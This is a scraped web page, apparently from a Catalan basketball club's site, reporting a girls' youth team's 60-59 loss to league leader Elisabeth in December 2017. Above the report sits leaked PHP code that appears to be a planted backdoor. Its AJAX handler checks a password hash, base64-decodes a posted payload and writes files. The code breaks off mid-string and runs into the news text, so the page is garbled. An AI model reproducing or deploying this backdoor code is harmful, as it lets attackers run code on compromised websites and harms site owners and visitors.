function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení C, amb la mel als llavis contra el líder, l'Elisabeth (60-59) - Tgn Bàsquet Club -

L’infantil femení C, amb la mel als llavis contra el líder, l’Elisabeth (60-59)

Updated: desembre 5, 2017

L’equip infantil femení C va estar a punt de derrotar el líder de la lliga, l’Elisabeth. El conjunt lila va fer uns primers quinze minuts de llibre, els millors del curs però no va saber rematar la feina abans del descans i el seu rival ho va aprofitar per marcar un parcial de 17-6 en els cinc minuts previs a l’equador del matx. Tot i això, les noies del TGN Bàsquet van demostrar caràcter i força i van remuntar el desavantatge. El premi hauria estat la victòria i va estar a punt d’arribar en l’última possessió del matx en què el TGN Bàsquet va llençar el que hauria estat el triple del triomf, però no va entrar.